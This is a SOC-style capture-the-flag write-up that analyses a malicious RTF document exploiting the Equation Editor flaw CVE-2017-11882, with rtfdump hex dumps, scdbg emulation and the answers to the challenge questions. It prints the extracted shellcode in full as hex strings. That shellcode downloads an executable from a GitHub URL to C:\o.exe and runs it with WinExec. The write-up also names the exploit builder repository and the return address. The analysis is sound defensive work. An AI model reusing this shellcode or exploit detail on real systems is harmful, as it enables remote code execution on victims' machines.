Emprisa Maldoc
Emprisa Maldoc
Challenge Link: Emprisa Maldoc
Scenario:
As a SOC analyst, you were asked to inspect a suspected document a user received in his inbox. One of your colleagues told you that he could not find anything suspicious. However, throwing the document into the sandboxing solution triggered some alerts.
Your job is to investigate the document further and confirm whether it’s malicious or not.
Analysis:
The challenge file is a RTF document, c39-EmprisaMaldoc.rtf. Although RTF document does not support macros, it allows embedding version 1 OLE (Object Linking and Embedding) objects. So lets check for any embedded OLE objects within the RTF document using rtfdump.
1
2
3
4
$ rtfdump.py -f O c39-EmprisaMaldoc.rtf
7 Level 3 c= 0 p=000000f3 l= 7267 h= 7254; 4678 b= 0 O u= 0 \*\objdata
Name: b'Equation.3\x00' Size: 3584 md5: 86e11891181069b51cc3d33521af9f1e magic: d0cf11e0
An OLE object named Equation.3 (md5: 86e11891181069b51cc3d33521af9f1e and magic: d0cf11e0) can be seen. This object is interesting because of well-known vulnerability targeting Equation Editor (CVE-2017-11882), which is a stack-based buffer overflow that allowed remote code execution.
Equation Editor functions as Microsoft Office component for inserting or modifying OLE elements in documents. As it is operates as out-of-process COM server, hosted by eqnedt32.exe, it run in its own process and accepts commands from other processes. As a result, an attacker can execute code from within the eqnedt32.exe process when exploited.
Lets check the contents of this OLE object using rtfdump.py.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
rtfdump.py -s 7 -H c39-EmprisaMaldoc.rtf
00000000: 01 05 00 00 02 00 00 00 0B 00 00 00 45 71 75 61 ............Equa
00000010: 74 69 6F 6E 2E 33 00 00 00 00 00 00 00 00 00 00 tion.3..........
00000020: 0E 00 00 D0 CF 11 E0 A1 B1 1A E1 00 00 00 00 00 ................
00000030: 00 00 00 00 00 00 00 00 00 00 00 3E 00 03 00 FE ...........>....
00000040: FF 09 00 06 00 00 00 00 00 00 00 00 00 00 00 01 ................
00000050: 00 00 00 01 00 00 00 00 00 00 00 00 10 00 00 02 ................
00000060: 00 00 00 01 00 00 00 FE FF FF FF 00 00 00 00 00 ................
00000070: 00 00 00 FF FF FF FF FF FF FF FF FF FF FF FF FF ................
00000080: FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF ................
00000090: FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF ................
000000A0: FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF ................
000000B0: FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF ................
000000C0: FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF ................
000000D0: FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF ................
000000E0: FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF ................
000000F0: FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF ................
00000100: FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF ................
00000110: FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF ................
00000120: FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF ................
00000130: FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF ................
00000140: FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF ................
00000150: FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF ................
00000160: FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF ................
00000170: FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF ................
00000180: FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF ................
00000190: FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF ................
000001A0: FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF ................
000001B0: FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF ................
000001C0: FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF ................
000001D0: FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF ................
000001E0: FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF ................
000001F0: FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF ................
00000200: FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF ................
00000210: FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF ................
00000220: FF FF FF FD FF FF FF 04 00 00 00 FE FF FF FF 05 ................
00000230: 00 00 00 FE FF FF FF FE FF FF FF FF FF FF FF FF ................
00000240: FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF ................
00000250: FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF ................
00000260: FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF ................
00000270: FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF ................
00000280: FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF ................
00000290: FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF ................
000002A0: FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF ................
000002B0: FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF ................
000002C0: FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF ................
000002D0: FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF ................
000002E0: FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF ................
000002F0: FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF ................
00000300: FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF ................
00000310: FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF ................
00000320: FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF ................
00000330: FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF ................
00000340: FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF ................
00000350: FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF ................
00000360: FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF ................
00000370: FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF ................
00000380: FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF ................
00000390: FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF ................
000003A0: FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF ................
000003B0: FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF ................
000003C0: FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF ................
000003D0: FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF ................
000003E0: FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF ................
000003F0: FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF ................
00000400: FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF ................
00000410: FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF ................
00000420: FF FF FF 52 00 6F 00 6F 00 74 00 20 00 45 00 6E ...R.o.o.t. .E.n
00000430: 00 74 00 72 00 79 00 00 00 00 00 00 00 00 00 00 .t.r.y..........
00000440: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000450: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000460: 00 00 00 16 00 05 00 FF FF FF FF FF FF FF FF 02 ................
00000470: 00 00 00 02 CE 02 00 00 00 00 00 C0 00 00 00 00 ................
00000480: 00 00 46 00 00 00 00 00 00 00 00 00 00 00 00 70 ..F............p
00000490: F7 DE CF 00 64 D3 01 03 00 00 00 C0 03 00 00 00 ....d...........
000004A0: 00 00 00 01 00 4F 00 6C 00 65 00 00 00 00 00 00 .....O.l.e......
000004B0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
000004C0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
000004D0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
000004E0: 00 00 00 0A 00 02 01 FF FF FF FF FF FF FF FF FF ................
000004F0: FF FF FF 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000500: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000510: 00 00 00 00 00 00 00 00 00 00 00 14 00 00 00 00 ................
00000520: 00 00 00 01 00 43 00 6F 00 6D 00 70 00 4F 00 62 .....C.o.m.p.O.b
00000530: 00 6A 00 00 00 00 00 00 00 00 00 00 00 00 00 00 .j..............
00000540: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000550: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000560: 00 00 00 12 00 02 01 01 00 00 00 03 00 00 00 FF ................
00000570: FF FF FF 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000580: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000590: 00 00 00 00 00 00 00 01 00 00 00 66 00 00 00 00 ...........f....
000005A0: 00 00 00 03 00 4F 00 62 00 6A 00 49 00 6E 00 66 .....O.b.j.I.n.f
000005B0: 00 6F 00 00 00 00 00 00 00 00 00 00 00 00 00 00 .o..............
000005C0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
000005D0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
000005E0: 00 00 00 12 00 02 01 FF FF FF FF 04 00 00 00 FF ................
000005F0: FF FF FF 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000600: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000610: 00 00 00 00 00 00 00 03 00 00 00 06 00 00 00 00 ................
00000620: 00 00 00 FE FF FF FF 02 00 00 00 FE FF FF FF FE ................
00000630: FF FF FF 05 00 00 00 06 00 00 00 07 00 00 00 08 ................
00000640: 00 00 00 09 00 00 00 0A 00 00 00 0B 00 00 00 0C ................
00000650: 00 00 00 0D 00 00 00 0E 00 00 00 FE FF FF FF FF ................
00000660: FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF ................
00000670: FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF ................
00000680: FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF ................
00000690: FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF ................
000006A0: FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF ................
000006B0: FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF ................
000006C0: FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF ................
000006D0: FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF ................
000006E0: FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF ................
000006F0: FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF ................
00000700: FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF ................
00000710: FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF ................
00000720: FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF ................
00000730: FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF ................
00000740: FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF ................
00000750: FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF ................
00000760: FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF ................
00000770: FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF ................
00000780: FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF ................
00000790: FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF ................
000007A0: FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF ................
000007B0: FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF ................
000007C0: FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF ................
000007D0: FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF ................
000007E0: FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF ................
000007F0: FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF ................
00000800: FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF ................
00000810: FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF ................
00000820: FF FF FF 01 00 00 02 08 00 00 00 00 00 00 00 00 ................
00000830: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000840: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000850: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000860: 00 00 00 01 00 FE FF 03 0A 00 00 FF FF FF FF 02 ................
00000870: CE 02 00 00 00 00 00 C0 00 00 00 00 00 00 46 17 ..............F.
00000880: 00 00 00 4D 69 63 72 6F 73 6F 66 74 20 45 71 75 ...Microsoft Equ
00000890: 61 74 69 6F 6E 20 33 2E 30 00 0C 00 00 00 44 53 ation 3.0.....DS
000008A0: 20 45 71 75 61 74 69 6F 6E 00 0B 00 00 00 45 71 Equation.....Eq
000008B0: 75 61 74 69 6F 6E 2E 33 00 F4 39 B2 71 00 00 00 uation.3..9.q...
000008C0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
000008D0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
000008E0: 00 00 00 00 00 03 00 01 00 00 00 00 00 00 00 00 ................
000008F0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000900: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000910: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000920: 00 00 00 1C 00 00 00 02 00 A8 C3 99 02 00 00 00 ................
00000930: 00 00 00 48 90 5D 00 6C 9C 5B 00 00 00 00 00 03 ...H.].l.[......
00000940: 01 01 03 0A 0A 01 08 5A 5A B8 44 EB 71 12 BA 78 .......ZZ.D.q..x
00000950: 56 34 12 31 D0 8B 08 8B 09 8B 09 66 83 C1 3C FF V4.1.......f..<.
00000960: E1 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
00000970: 90 90 90 90 90 14 21 40 00 00 00 90 90 90 90 90 ......!@........
00000980: 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
00000990: 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
000009A0: 90 90 90 33 C9 64 8B 41 30 8B 40 0C 8B 70 14 AD [email protected]..
000009B0: 96 AD 8B 58 10 8B 53 3C 03 D3 8B 52 78 03 D3 8B ...X..S<...Rx...
000009C0: 72 20 03 F3 33 C9 41 AD 03 C3 81 38 47 65 74 50 r ..3.A....8GetP
000009D0: 75 F4 81 78 04 72 6F 63 41 75 EB 81 78 08 64 64 u..x.rocAu..x.dd
000009E0: 72 65 75 E2 8B 72 24 03 F3 66 8B 0C 4E 49 8B 72 reu..r$..f..NI.r
000009F0: 1C 03 F3 8B 14 8E 03 D3 33 C9 51 68 2E 65 78 65 ........3.Qh.exe
00000A00: 68 43 3A 5C 6F 53 52 51 68 61 72 79 41 68 4C 69 hC:\oSRQharyAhLi
00000A10: 62 72 68 4C 6F 61 64 54 53 FF D2 83 C4 0C 59 50 brhLoadTS.....YP
00000A20: 51 66 B9 45 00 71 00 75 00 61 00 74 00 69 00 6F Qf.E.q.u.a.t.i.o
00000A30: 00 6E 00 20 00 4E 00 61 00 74 00 69 00 76 00 65 .n. .N.a.t.i.v.e
00000A40: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000A50: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000A60: 00 00 00 20 00 02 00 FF FF FF FF FF FF FF FF FF ... ............
00000A70: FF FF FF 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000A80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000A90: 00 00 00 00 00 00 00 04 00 00 00 B5 02 00 00 00 ................
00000AA0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000AB0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000AC0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000AD0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000AE0: 00 00 00 00 00 00 00 FF FF FF FF FF FF FF FF FF ................
00000AF0: FF FF FF 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000B00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000B10: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000B20: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000B30: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000B40: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000B50: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000B60: 00 00 00 00 00 00 00 FF FF FF FF FF FF FF FF FF ................
00000B70: FF FF FF 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000B80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000B90: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000BA0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000BB0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000BC0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000BD0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000BE0: 00 00 00 00 00 00 00 FF FF FF FF FF FF FF FF FF ................
00000BF0: FF FF FF 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000C00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000C10: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000C20: 00 00 00 6C 6C 51 68 6F 6E 2E 64 68 75 72 6C 6D ...llQhon.dhurlm
00000C30: 54 FF D0 83 C4 10 8B 54 24 04 33 C9 51 66 B9 65 T......T$.3.Qf.e
00000C40: 41 51 33 C9 68 6F 46 69 6C 68 6F 61 64 54 68 6F AQ3.hoFilhoadTho
00000C50: 77 6E 6C 68 55 52 4C 44 54 50 FF D2 33 C9 8D 54 wnlhURLDTP..3..T
00000C60: 24 24 51 51 52 EB 47 51 FF D0 83 C4 1C 33 C9 5A $$QQR.GQ.....3.Z
00000C70: 5B 53 52 51 68 78 65 63 61 88 4C 24 03 68 57 69 [SRQhxeca.L$.hWi
00000C80: 6E 45 54 53 FF D2 6A 05 8D 4C 24 18 51 FF D0 83 nETS..j..L$.Q...
00000C90: C4 0C 5A 5B 68 65 73 73 61 83 6C 24 03 61 68 50 ..Z[hessa.l$.ahP
00000CA0: 72 6F 63 68 45 78 69 74 54 53 FF D2 FF D0 E8 B4 rochExitTS......
00000CB0: FF FF FF 68 74 74 70 73 3A 2F 2F 72 61 77 2E 67 ...https://raw.g
00000CC0: 69 74 68 75 62 75 73 65 72 63 6F 6E 74 65 6E 74 ithubusercontent
00000CD0: 2E 63 6F 6D 2F 61 63 63 69 64 65 6E 74 61 6C 72 .com/accidentalr
00000CE0: 65 62 65 6C 2F 61 63 63 69 64 65 6E 74 61 6C 72 ebel/accidentalr
00000CF0: 65 62 65 6C 2E 63 6F 6D 2F 67 68 2D 70 61 67 65 ebel.com/gh-page
00000D00: 73 2F 74 68 65 6D 65 2F 69 6D 61 67 65 73 2F 74 s/theme/images/t
00000D10: 65 73 74 2E 70 6E 67 00 00 00 00 00 00 00 00 00 est.png.........
00000D20: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000D30: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000D40: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000D50: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000D60: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000D70: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000D80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000D90: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000DA0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000DB0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000DC0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000DD0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000DE0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000DF0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000E00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000E10: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000E20: 00 00 00 01 05 00 00 00 00 00 00 ...........
In the above dump, there are sequence of NOP (0x90) instructions starting offset 0x961, which are commonly used as padding within shellcode. Consequently, those part of the data following the NOP instruction was extracted as can be seen below:
1
9033c9648b41308b400c8b7014ad96ad8b58108b533c03d38b527803d38b722003f333c941ad03c381384765745075f4817804726f634175eb8178086464726575e28b722403f3668b0c4e498b721c03f38b148e03d333c951682e65786568433a5c6f5352516861727941684c696272684c6f61645453ffd283c40c59505166b94500710075006100740069006F006E0020004E00610074006900760065000000000000000000000000000000000000000000000000000000000000000000000020000200FFFFFFFFFFFFFFFFFFFFFFFF00000000000000000000000000000000000000000000000000000000000000000000000004000000B5020000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000FFFFFFFFFFFFFFFFFFFFFFFF0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000FFFFFFFFFFFFFFFFFFFFFFFF0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000FFFFFFFFFFFFFFFFFFFFFFFF0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000006c6c51686f6e2e646875726c6d54ffd083c4108b54240433c95166b965415133c9686f46696c686f616454686f776e6c6855524c445450ffd233c98d542424515152eb4751ffd083c41c33c95a5b5352516878656361884c24036857696e455453ffd26a058d4c241851ffd083c40c5a5b6865737361836c2403616850726f6368457869745453ffd2ffd0e8b4ffffff68747470733a2f2f7261772e67697468756275736572636f6e74656e742e636f6d2f6163636964656e74616c726562656c2f6163636964656e74616c726562656c2e636f6d2f67682d70616765732f7468656d652f696d616765732f746573742e706e6700000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
Lets now analyze this shellcode using scdbg.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
scdbg.exe /s -1 /f shellcode.bin
Loaded 914 bytes from file shellcode.bin
Detected straight hex encoding input format converting...
Initialization Complete..
Max Steps: -1
Using base offset: 0x401000
401079 GetProcAddress(LoadLibraryA)
401088 error accessing 0x00000069 not mapped
401088 00740069 add [eax+eax+0x69],dh step: 2117 foffset: 88
eax=0 ecx=0 edx=6578652e ebx=6f5c3a43
esp=12fe04 ebp=7c80ae40 esi=7c801d7b edi=0 EFL 4 P
40108c 006F00 add [edi+0x0],ch
40108f 6E outsb
401090 0020 add [eax],ah
401092 004E00 add [esi+0x0],cl
The emulation showed that the shellcode attempted to resolve LoadLibaryA Win API dynamically, and then got error.
Checking back the previous output of rtfdump, we can see a large sequence of null bytes (0x00) following the string Equation Native. These null bytes, along with the string Equation Native were removed to get the actual shellcode, which is shown below:
1
9033c9648b41308b400c8b7014ad96ad8b58108b533c03d38b527803d38b722003f333c941ad03c381384765745075f4817804726f634175eb8178086464726575e28b722403f3668b0c4e498b721c03f38b148e03d333c951682e65786568433a5c6f5352516861727941684c696272684c6f61645453ffd283c40c59505166b96c6c51686f6e2e646875726c6d54ffd083c4108b54240433c95166b965415133c9686f46696c686f616454686f776e6c6855524c445450ffd233c98d542424515152eb4751ffd083c41c33c95a5b5352516878656361884c24036857696e455453ffd26a058d4c241851ffd083c40c5a5b6865737361836c2403616850726f6368457869745453ffd2ffd0e8b4ffffff68747470733a2f2f7261772e67697468756275736572636f6e74656e742e636f6d2f6163636964656e74616c726562656c2f6163636964656e74616c726562656c2e636f6d2f67682d70616765732f7468656d652f696d616765732f746573742e706e6700000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
The cleaned shellcode was then again re-analyzed using scdbg.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
scdbg.exe /s -1 /f shellcode.bin
Loaded 514 bytes from file shellcode.bin
Detected straight hex encoding input format converting...
Initialization Complete..
Max Steps: -1
Using base offset: 0x401000
401079 GetProcAddress(LoadLibraryA)
401091 LoadLibraryA(urlmon.dll)
4010ba GetProcAddress(URLDownloadToFileA)
4010c8 URLDownloadToFileA(https://raw.githubusercontent.com/accidentalrebel/accidentalrebel.com/gh-pages/theme/images/test.png, C:\o.exe)
4010e4 GetProcAddress(WinExec)
4010ed WinExec(C:\o.exe)
40110a GetProcAddress(ExitProcess)
40110c ExitProcess(1953069125)
Stepcount 2177
The emulation revealed that shellcode resolved various Win API dynamically:
- Initially, it resolved
LoadLibraryand then use it to loadurlmon.dll. - Then, it resolved
URLDownloadToFileA, which was invoked to download a next stager file from GitHub URL and save it asC:\o.exe. - It then resolved
WinExec, which was invoked to execute the downloaded file.
Questions:
What is the CVE ID of the exploited vulnerability?
Show Answer
CVE-2017-11882 To reproduce the exploit in a lab environment and mimic a corporate machine running Microsoft office 2007, a specific patch should not be installed. Provide the patch number.
What is the magic signature in the object data?
Show Answer
d0cf11e0 What is the name of the spawned process when the document gets opened?
Show Answer
eqnedt32.exe The RTF document exploits Equation Editor vulnerability and injects shellcode into eqnedt32.exe process, which can also be seen in Any.Run.
What is the full path of the downloaded payload?
Show Answer
C:\o.exe Where is the URL used to fetch the payload?
Show Answer
https://raw.githubusercontent.com/accidentalrebel/accidentalrebel.com/gh-pages/theme/images/test.png The document contains an obfuscated shellcode. What string was used to cut the shellcode in half? (Two words, space in between)
Show Answer
Equation Native What function was used to download the payload file from within the shellcode?
Show Answer
URLDownloadToFileA What function was used to execute the downloaded payload file?
Show Answer
WinExec Which DLL gets loaded using the “LoadLibrayA” function?
Show Answer
urlmon.dll What is the FONT name that gets loaded by the process to trigger the buffer overflow exploit?(3 words)
Show Answer
Times New Roman Checking other stream of RTF document using rtfdump, we can find the font name.
$ rtfdump.py -s 8 -H c39-EmprisaMaldoc.rtf
00000000: 01 00 09 00 00 03 9E 00 00 00 02 00 1C 00 00 00 ................
00000010: 00 00 05 00 00 00 09 02 00 00 00 00 05 00 00 00 ................
00000020: 02 01 01 00 00 00 05 00 00 00 01 02 FF FF FF 00 ................
00000030: 05 00 00 00 2E 01 18 00 00 00 05 00 00 00 0B 02 ................
00000040: 00 00 00 00 05 00 00 00 0C 02 A0 01 60 02 12 00 ............`...
00000050: 00 00 26 06 0F 00 1A 00 FF FF FF FF 00 00 10 00 ..&.............
00000060: 00 00 C0 FF FF FF C6 FF FF FF 20 02 00 00 66 01 .......... ...f.
00000070: 00 00 0B 00 00 00 26 06 0F 00 0C 00 4D 61 74 68 ......&.....Math
00000080: 54 79 70 65 00 00 20 00 1C 00 00 00 FB 02 80 FE Type.. .........
00000090: 00 00 00 00 00 00 90 01 00 00 00 00 04 02 00 10 ................
000000A0: 54 69 6D 65 73 20 4E 65 77 20 52 6F 6D 61 6E 00 Times New Roman.
000000B0: FE FF FF FF 5F 2D 0A 65 00 00 0A 00 00 00 00 00 ...._-.e........
000000C0: 04 00 00 00 2D 01 00 00 09 00 00 00 32 0A 60 01 ....-.......2.`.
000000D0: 10 00 03 00 00 00 31 31 31 00 0A 00 00 00 26 06 ......111.....&.
000000E0: 0F 00 0A 00 FF FF FF FF 01 00 00 00 00 00 1C 00 ................
000000F0: 00 00 FB 02 10 00 07 00 00 00 00 00 BC 02 00 00 ................
00000100: 00 00 01 02 02 22 53 79 73 74 65 6D 00 00 48 00 ....."System..H.
00000110: 8A 01 00 00 0A 00 06 00 00 00 48 00 8A 01 FF FF ..........H.....
00000120: FF FF 6C E2 18 00 04 00 00 00 2D 01 01 00 04 00 ..l.......-.....
00000130: 00 00 F0 01 00 00 03 00 00 00 00 00 ............What is the GitHub link of the tool that was likely used to make this exploit?
Show Answer
https://github.com/rip1s/CVE-2017-11882 Found the Github repository via Google dorking:
site:github.com intext:CVE-2017-11882 What is the memory address written by the exploit to execute the shellcode?
Show Answer
0x00402114 Can be found in the
CVE-2017-11882.py source code from the same Github repository. This post is licensed under CC BY 4.0 by the author.